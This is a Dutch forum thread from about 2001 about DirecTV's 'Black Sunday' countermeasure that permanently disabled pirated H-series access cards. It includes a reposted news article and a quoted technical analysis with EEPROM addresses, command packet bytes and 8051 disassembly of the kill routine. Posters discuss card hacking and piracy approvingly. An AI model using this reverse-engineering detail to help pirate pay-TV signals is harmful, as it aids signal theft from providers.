Ga naar inhoud


Black Sunday in USA en Canada


Aanbevolen berichten

Geplaatst:

Op de site van <A HREF="http://www.securityfocus.com" TARGET=_blank>www.securityfocus.com</A> op blz 143 vond ik gisteren een uitgebreid verslag van wat tester kort had samengevat op dit board. Het artikel is geschreven door Kevin Poulsen op 25 januari. Helaas werken ze dit weekend aan de site en is hij tot zondag uit het internet. Ik heb het bericht wel uitgeprint, maar het stuk is te lang om hier in te typen. Daarom volgt hier alleen de technische beschrijving (gebrekkig vertaald):<P>Net zoals hier in Europa kunnen in de USA kaarten door de receiver worden beschreven. In het begin van de jaren 90 werden er zoek-en-vernietig programma's gebruikt, waardoor de software op kaarten met of zonder bepaalde codes werd beschadigd tijdens het tv-kijken.<P>Het logische antwoord was om read-only kaarten te gebruiken, zodat search-and-destroy niet meer werkte.<P>Nu kun je en mag je in de USA (ik hoor verschillende klanken over de situatie hier) ook de software in de receiver beschrijven.<P>Ruim een jaar geleden begon DirecTV een aantal bytes op de kaart te schrijven en tevens de receiver-software, die een kaart zonder de update weigerde. Hierdoor werden ofwel de kaarten weer open gezet voor updates, ofwel de noodzakelijke bytes werden handmatig op de kaart gezet.<P>Dit ging maanden lang door: DirecTV bleef nieuwe zowel data schrijven naar de kaarten alsook naar de receivers. In november stopten ze met het beschrijven, na een totaal van 63 updates naar de zogenaamde H-cards.<P>Nu waren deze updates niet random gekozen, maar deze data vormde een heus computer-programma op de H-kaarten, dat byte voor byte was verstuurd. Hackers analyseerden dit programma en begrepen dat dit programma kon worden aangestuurd om de kaart permanent te de-activeren. Dit alles op commando en op afstand.<P>Afgelopen zondag heeft DirecTV het commando gegeven, waardoor een eindeloze lus naar het "write once" deel van het kaart-geheugen wordt geschreven. Aangezien dit deel niet kan worden gewijzigd, is de kaart onbruikbaar. In feite hadden ze dit commando al in november kunnen geven, maar ze hebben gewacht tot januari.<P>Er blijken vele duizenden kaarten onbruikbaar gemaakt, maar niet alle. Er bestaan naast de H-kaarten ook HU-kaarten, PC-emulaties en natuurlijk H-kaarten met schrijf-beveiliging. Deze kaarten en uiteraard originele kaarten werken nog steeds in de states.<P>---------------------------------------------<P>Nu weet ik niet of het ook hier technisch mogelijk en/of legaal is hetzelfde te doen. Misschien is dit de grote klap die C+ voorspelde te zullen uitdelen en waarvan nu een enkeling slachtoffer is (zie elders op de site).<P>------------------<BR>abc


Geplaatst:

Hier volgt een Engelstalige beschrijving van hoe vorige zondag de H-kaarten in de USA en Canada zijn kapotgeschreven. Bron: <A HREF="http://www.dr7.com" TARGET=_blank>www.dr7.com</A><P>This evening at approximately 8:30 pm PST DirecTV struck with a vengeance and unleashed what will long be known as "Black Sunday", below is a accurate and detailed explanation by Magician.<P>BEGIN QUOTE: <P>As most everybody is aware, the ability of the dynamic code to execute a kill-type ECM was displayed today on "Black Sunday". <P>First, the bad news: the ECMs wrote 4 bytes to "write once" area of the EEPROM, 8000h-8003h. Unfortunately, one of the bytes that is changed is 8000h, which is checked extremely early in the ROM startup code (003Fh) to see if it contains "33h". These ECMs re-wrote this byte to "00h", which means that it very quickly enters an infinite loop because "P1.7" is not set. Since this area of the H card is "write once", there is no way to reset this byte back to "33h" to allow normal startup to continue, even by way of an unlooper. <P>Second, for those interested, here are all the EEPROM addresses that were tested to see if they contained modified bytes. Each byte was tested in its own packet (i.e., one address at a time): <P><BR>code:--------------------------------------------------------------------------------8243 <BR>Vector for setting DPTR to ZKT secret vector <BR>8246,8247 Vector for Cmd09 vector <BR>8255 Vector for Ins58 patch vector <BR>8258 Ins44 preprocessing vector <BR>825B Ins44 extras vector <BR>825E Find tier or PPV vector <BR>8264 "EndInsHandling" vector <BR>8273 Cmd1F vector <BR>827C,827D Ins54 vector <BR>8282,8283 Ins18/Ins1A vecotr <BR>8440 First byte of channel blackout data checked if non-zero) <BR>8582,858C,8593 Cmd60 code <BR>85B7 B7 nano vector <BR>85BE BD nano vector <BR>85C0,85C1,85C2 C0 nano vector <BR>85C3 C3 nano vector <BR>85C6,85C7 C6 nano vector <BR>85E2,85E6,85ED,85EF,85F6 B5 nano code <BR>8606,8608,8611 AddAToDfdNanoBufIfFlOpn code <BR>8630 Deferred Cmd60 processing code <BR>86DD Never-executed portion of old C6 nano code <BR>87A1 Old CF nano jump table <BR>8800 Hash algorithm code <BR>8955 Main loop vector code <BR>8973 Ins18/Ins1A code <BR>8975 Ins54 check code <BR>8982 Setup for Ins38 code <BR>89A0,89A3 Setup for Ins44 code <BR>89A6,89B2,89B9 Setup for Ins4C code <BR>89DF End of main loop vector code <BR>8BFE Cmd0C code <BR>8CC7,8CCA,8CCB Preprocess deferred Cmd60 code <BR>8CD9,8CDE Cmd0B for non-virgin cards code <BR>8CF2,8CFE Ins58 patch code <BR>8D04,8D09,8D0D,8D11,8D14,8D178D1A,8D1D,8D20,8D22,8D24,8D25,8D32 Ins54 <BR>code <BR>8D66,8D6A,8D72,8D76 Add ASIC bytes to signature hash code <BR>8DD0,8DD3,8E68 Do 1 hash iteration code <BR>8F2F Preprocess Cmd09 code <BR>8F53 Cmd0C patch 1 code <BR>-------------------------------------------------------------------------------- <P>Here is an example dynamic code packet (for the 8D1Ah address; all of the addresses were tested using similar packets, except for 8440h which used a JNZ instead of JZ): <P><BR>code:--------------------------------------------------------------------------------C3 <BR>nano used to preset RAM locatiosn 10h-1Fh: <P>C3 0A 00 20 99 03 AF 01 00 04 00 09 | Seed hash only (using 9 data bytes) <P>results in these bytes at 10h-1Fh: <P>20 99 03 AF 01 00 04 00 09 CB 29 71 06 19 74 D0 <BR>^ ^ ^ ^ ^ ^ ^ ^ ^ <BR>| | | | | | | | |__ Fourth byte loaded in EEPROM write register <BR>| | | | | | | |_____ Third byte loaded in EEPROM write register <BR>| | | | | | |________ Hi byte of 1st loop return address and second byte loaded in EEPROM write register <BR>| | | | | |___________ Lo byte of 1st loop return address and first byte loaded in EEPROM write register <BR>| | | | |______________ Hi byte of 2nd loop return address <BR>| | | |_________________ Lo byte of 2nd loop return address <BR>| | |____________________ Hi byte of 3rd loop return address <BR>| |_______________________ Lo byte of 3rd loop return address <BR>|__________________________ What 8D1Ah is compared to <P>The C9 nano looked like this: <P>C9 10 20 90 8D 1A E0 47 60 08 90 | Write 15 bytes+RET, execute and hash <BR>80 00 78 15 75 81 16 : <P>which caused this code to be executed: <P>893C mov DPTR,#8D1Ah <BR>893F movx A,@DPTR <BR>8940 xrl A,@R1 <BR>8941 jz 894Bh <BR>8943 mov DPTR,#8000h <BR>8946 mov R0,#15h <BR>8948 mov SP,#16h <BR>894B ret <BR>-------------------------------------------------------------------------------- <P>Remember, R1 starts equal to 10h. So the above code does the following: <P>Compare 8D1Ah to @10h (which contains #20h) <BR>If they match, simply return <BR>Otherwise, set DPTR to 8000h <BR>Set R0 to 15h <BR>Reset the stack to 16h and RET, to resume execution at 0400h to load <BR>"00 04 00 09" into EEPROM write register which RETs to 01AFh to enable <BR>EEPROM write mode which RETs to 0399h to write 00 04 00 09 to 8000-8003h. <P>In addition, there was an ECM to detect an H cards running with non-H CAM IDs, although this packet did not loop the card but simply "locked it up" until the next reset: <P><BR>code:--------------------------------------------------------------------------------C3 <BR>nano used to preset RAM locatiosn 10h-1Fh: <P>C3 0B 00 FE FC 32 00 00 04 AC 01 68 14 | Seed hash only (using 10 data bytes) <P>results in these bytes at 10h-1Fh: <P>FE FC 32 00 00 04 AC 01 68 14 8A DF A3 AA 81 34 <BR>^ ^ ^ ^ ^ ^ ^ ^ <BR>| | | | | | | |_ Hi byte of 1st loop return address <BR>| | | | | | |____ Lo byte of 1st loop return address <BR>| | | | | |_______ Hi byte of 2nd loop return address <BR>| | | | |__________ Lo byte of 2nd loop return address <BR>| | | |_____________ Hi byte of 3rd loop return address <BR>| | |________________ Lo byte of 3rd loop return address <BR>| |___________________ Hi byte of 4th loop return address <BR>|______________________ Lo byte of 4th loop return address <P>The C9 nano looked like this: <P>C9 12 20 90 83 74 81 60 07 57 70 | Write 17 bytes+RET, execute and hash <BR>05 09 B9 12 F6 22 75 81 19 : <P>which caused this code to be executed: <P>893C mov DPTR,#8374h <BR>893F movx A,@DPTR++ <BR>8940 jz 8949h <BR>8942 anl A,@R1 <BR>8943 jnz 894Ah <BR>8945 inc R1 <BR>8946 cjne R1,#12h,893Fh <BR>8949 ret <BR>894A mov SP,#19h <BR>894D ret <BR>-------------------------------------------------------------------------------- <P>Remember, R1 starts equal to 10h. So the above code does the following: <P>If first byte of CAM ID is 00, return (everything OK). <BR>Otherwise, AND first CAM ID byte with byte @10h (#FEh) <BR>If result is non-zero (meaning first CAM ID byte is not 01h), go to ECM routine <BR>Otherwise, AND second CAM ID byte with @11h (#FCh) <BR>If result is non zero, go to ECM routine <BR>Otherwise, return (everything OK) <P>The ECM routine resets the SP to cause the RET to resume execution at <BR>1468h, which RETs to 01ACh, which RETs to 0400h, which RETs to the <BR>infinite loop at 0032h... <P>END QUOTE <P>

Geplaatst:

Hier een beschrijving van wat er vorige week in de USA plaatsvond (de site is weer down, en alhier een kopie van de tekst).<P>DirecTV zaps hackers<BR>Electronic warfare tactics wipe out thousands of hacked smart cards. <BR>By Kevin Poulsen <mailto:klp@securityfocus.com><BR>January 25, 2001 11:46 AM PT<P>Satellite television behemoth DirecTV struck a decisive blow against signal pirates Sunday night, when it transmitted a carefully crafted electronic message from its orbiting satellites and destroyed thousands of hacked smart cards, which for the last four years allowed pirates to gain free access to hundreds of channels of programming.<P>According to sources in the satellite TV underground, the vast majority of illicitly reprogrammed DirecTV access cards, which once had a street value of several hundred dollars each, were wiped out on what hackers are calling "Black Sunday." <BR> <<...>> <P>"It turned all these cards into ice scrapers," says a California pirate.<P>A spokesman for California-based DirecTV says company policy prevents him from confirming a specific cyber-strike. "But I will tell you that we do, from time to time, use electronic countermeasures," says spokesman Robert Mercer. "Obviously, we want only authorized people to receive our service."<P>DirecTV has been grist for pirates almost since inception, primarily due to well-funded research efforts in Canada, where the company is not licensed to provide service, and selling hacked access cards and equipment is not a crime.<P>"It's certainly a problem," says Mercer. "But we have an Office of Signal Integrity, a group of former FBI agents, dedicated to this issue."<P>The company reportedly acquired the ability to launch the electronic countermeasure (ECM) against pirates in November of last year, but held off on using it until Sunday. The massive counter-hack comes amid negotiations between DirecTV's parent company, General Motors, and media mogul Rupert Murdoch, who's considered acquiring DirecTV for an estimated $40 billion. 'We do, from time to time, use electronic countermeasures.'<P>DirecTV controls access to their signal through smart cards shipped with every system. Each plastic card resembles a credit card, but is in fact a completely self contained microcomputer with its own embedded software and memory. In normal operation, a subscriber inserts the card into a slot in the DirectTV receiver, and a satellite signal from the company tells the receiver which channels, if any, the subscriber is allowed to watch, based on the unique identification number coded into each card.<P>Sunday's ECM was aimed at hacked 'H' series smart cards. The H cards were shipped with receivers sold from late 1996 to early 1999, and later became valuable commodities among TV pirates as the technology to hack them plummeted in price, and the techniques became publicly known online. Card programming devices were sold through Canadian dealers, and hacker-authored software for the H card that allowed complete access to all programming -- including movie channels, sports and pay-per-view events -- was easily found on the Internet.<P>By most estimates, thousands of hacked H cards are circulating in the U.S. alone. They all became useless Sunday night, when DirecTV detonated a devilishly clever logic bomb the company planted in the access cards last year.<P>According to sources in the TV piracy underground, the counterstrike was the capstone to four years of electronic warfare over the H card. <P>DirecTV's system gives them the ability to reprogram smart cards remotely, through the set top receivers. In the 90's, the company used that capability in their initial response to the proliferation of hacked cards by broadcasting a search-and-destroy program to all the H cards that would look for hacked code, and damage the software in any cards that had it.<P>To counter that technique, hackers developed a method of making the cards "read only" after hacking them, so that DirecTV could no longer put their search-and-destroy programs onto the cards.<P>But DirecTV reacted to that wrinkle over a year ago, by taking advantage of their ability to remotely reprogram the set top satellite receivers, as well as the cards. The company sent a few specific bytes of data to all the H cards, while simultaneously reprogramming the satellite receivers to reject cards that didn't reflect the change. This forced hackers to update the cards manually with the new data, or to make the cards writable again.<P>Through the following months, DirecTV continued to add more data using this tactic. By the time they stopped in November, the company had made a total of sixty-three updates to the H cards.<P>By then, the hackers realized that the data was not arbitrarily chosen: DirecTV was actually sending a computer program to the H cards, a few bytes at a time. After analysis, the hackers predicted that the program would make it possible for the company to permanently disable the pirated cards on command.<P>DirecTV finally issued that command on Sunday, and used it to inject an endless loop into a "write once" section of the H cards' memory, which can not be modified a second time, according to an analysis on one satellite TV hacking site </external/http://www.dr7.com>. <P>"Why they didn't do it back in November is a big mystery," says the California hacker. <P>While "Black Sunday" was a devastating blow to pirates, it's not likely to end the electronic arms race between DirecTV and its hackers. <P>The company's current generation of smart cards, the so-called 'HU' card, has proven more resistant to tampering than its predecessor, but hacked versions are now turning up on the commercial gray market. Another technique, in which a pirate uses a PC to emulate an access card, was reportedly unaffected by the Sunday blast.<P>Smart cards are used for a variety of applications, including electronic customer identification for wireless GSM phones in Europe, and as new credit card offerings from Visa and American Express. "Smart cards are considered highly tamper resistant," says Don Davis, editor of Card Technology magazine. "There have been incidents where people have been able to attack them and tamper with them, but not very many that have proven to have commercial impact, like the problem DirectTV has had." <P>Het artikel kon je vinden op: <A HREF="http://www.securityfocus.com/news/143" TARGET=_blank>http://www.securityfocus.com/news/143</A><P>Mijns inziens zijn dezelfde achtergronden en technieken die in Spanje en Amerika gebruikt worden ook hier gebruikt. Bij Kanaal Digitaal (over heel Europa) gaan ze heus niet opnieuw het wiel uitvinden, als dat in de USA al is gedaan.<P>Lijkt mij vrij eenvoudig te controleren of dezelfde schade is aangericht en of hetzelfde destructieve programma aanwezig is.<P>------------------<BR>abc

Geplaatst:

Het hele verhaal (interessant trouwens!) staat of valt met het schrijven in een write-once geheugen. De vraag is of dat op de kaarten van C+ wel aanwezig is. <BR>Bovendien moet het dan opvallen tijdens meeloggen. <BR>Wat C+ kan is een programma via hun eigen ontvangers laden wat iets van de kaart checkt en als het niet klopt de ontvanger uitzet.

Geplaatst:

Wij zullen er hier weinig last van hebben.<BR>1/de kaarten uit de USA. komen van News Datacom (jawel dezelfde fabrikant die BskyB van hun kaartjes voorziet), en de kaartjes van ons (se** en ir****) komen van ??<BR>2/de kaartjes van news datacom hebben een soort van ingebouwde asic. dit is een processor met een algo. erin wat niet, of bijna niet uit te lezen is, of te reverse engineeren omdat je ineens met 2 algo's te maken hebt.<BR>Deze kaartjes zijn de onze dus heel ver vooruit, en zijn absoluut niet met onze acs1.2, en seca kaartjes te vergelijken, eerder met de digicard van BskyB. Het probleem van het eenmalig te beschrijven geheugen is ook niet nieuw, dit is een bekend fenomeen vanaf de 09 BskyB periode. deze kaarten hadden ook zoiets. als je kaart werd gekilld (invalid card), dan was er ook echt helemaal geen geluid meer uit te krijgen. dit gebeurde normaalgesproken alleen als je deze (Quickstart)kaarten via de phoenix opengezet had. als je je abo niet betaald had gaf de kaart de "please call" mededeling. Helaas hebben BskyB, en News Datacomm hier alleen maar van geleerd, en hebben wij het nakijken.<BR>peter

Niet gehinderd door enige vorm van technische kennis zet ik onbevangen overal mijn schroevendraaier en soldeerbout in.

Gast
Dit onderwerp is nu gesloten voor nieuwe reacties.
  • Wie is er online   0 leden

    • Er zijn geen geregistreerde gebruikers deze pagina aan het bekijken
×
×
  • Nieuwe aanmaken...